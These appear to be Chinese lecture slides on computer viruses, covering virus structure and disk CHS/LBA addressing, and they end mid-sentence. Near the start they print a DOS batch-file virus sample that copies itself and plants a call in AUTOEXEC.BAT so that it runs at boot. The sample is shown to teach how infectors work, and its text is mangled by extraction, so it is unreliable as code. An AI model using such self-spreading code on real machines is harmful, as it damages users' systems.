计算机病毒Computer Virus.ppt

计算机病毒Computer Virus 傅建明 Fujms@ 第二章 预备知识 主要内容：病毒的基本结构，磁盘结构，文件系统，文件格式 讲授：原理介绍与工具演示结合 基础和重点 第二章 预备知识 2.1 计算机病毒的结构 2.2 计算机磁盘的管理 2.3 Windows文件系统 2.4 计算机的引导过程 2.5 中断与异常 2.6 内存管理 2.7 EXE文件格式 计算机病毒的结构 ECHO?OFF IF %DRIVE%==A:\? GOTO?END123 IF %DRIVE%==C:\? GOTO?END123 IF %COMSPEC%= =C:\WINDOWS\COMMAND.COM?SET?DRIVE=A:\ IF? %COMSPEC%= =A:\COMMAND.COM? SET?DRIVE=C:\ IF?NOT?EXIST?%DRIVE%AUTOEXEC.BAT?GOTO?END123 COPY VIRUS.BAT? %DRIVE%NUL ECHO CALL?VIRUSTMP.DAT COPY %DRIVE%AUTOEXEC.BAT+TMP.DAT %DRIVE%AUTOEXEC.BAT NUL DEL? TMP.DATNUL Echo BAT Virus Test! I will format your Disk! :?END123 ECHO?ON 计算机病毒的结构 触发机制： 这部分主要用来控制病毒的传播和发作。 传播机制： 这部分主要负责病毒的感染和传播。 表现机制： 这个模块也称为破坏模块。 1 磁盘结构 计算机磁盘的管理 硬盘的三个基本参数-CHS ：磁头数（Heads）、柱面数（Cylinders）、扇区数（Sectors）、以及相应的寻址方式。 磁头数（Heads）： 8bit；0-255 柱面数（Cylinders）： 10bit，0-1023 扇区数(Sectors）： 6bit，0-63 一个硬盘实际最大容量为： 255 * 1023 * 63 * 512/1048576 = 8024 MB 计算机磁盘的管理 NORMAL, 普 通 模 式: 这 是 原 来 的IDE 硬 盘 工 作 模 式， 支 持 的 最 大 柱 面 数 为1024， 最 大 磁 头 数 为16， 每 磁 道 最 大 扇 区 数 为63， 该 模 式 可 管 理 的 最 大 硬 盘 容 量 为： 1024 ×16 ×63 ×512 =504MB 计算机磁盘的管理 LBA（Logical Block Addressing）, 逻 辑 块 地 址 模 式: 在 该 模 式 下 设 置 的 柱 面 数、 磁 头 数 和 每 磁 道 扇 区 数 并 不 是 实 际 的 物 理 参 数， 在 访 问 硬 盘 时， 由EIDE 控 制 器 把 由 柱 面 数、 磁 头 数 和 每 磁 道 扇 区 数 等 参 数 确 定 的 逻 辑 地 址 转 换 为 实 际 的 物 理 地 址。 支 持 的 最 大 磁 头 数 为255， 其 他 参 数 与 普 通 模 式 相 同。 因 此， 该 模 式 可 管 理 的 最 大 硬 盘 容 量 为： ?1024 ×255 ×63 ×512= 8024 MB 计算机磁盘的管理 LBA=[(cylinder * heads_per_cylinder + heads)* sectors_per_track] +(sector-1) C=LBA DIV (PH*PS) H=(LBA DIV PS) mod PH S=LBA mod PS 计算机磁盘的管理 ATA-1: C-16bit,H-8bit, S-4bit(28bit) MAX=65536×255×16×512/1024 KB=127.5 GB Int 13: C-10bit, H-8bit, C-6bit(24bit) EX Int 13: 64bit线性地址 BigDrives：CHS每个参数为16bit=48bit 64T 支持大硬盘：芯片组,主板BIOS,操作系统。 计算机磁盘的管理 ⑶LARGE, 大 模 式: 当 硬 盘 的 柱 面 数 超 过1024 而 又 不 为LBA 所 支 持 时， 可 采 用 该 模 式。LARGE 模 式 参 数 设 置 方 法 是 把 柱 面 数 除 以2， 把 磁 头 数 乘 以2， 使 柱 面 减 少 容 量 不 变。 例 如， 硬 盘 物 理 柱 面 数 为1460， 磁 头 数 为16， 进 入LARGE 模 式 则 变 为 柱 面 数730， 磁 头 数32， 这 样 在 一 些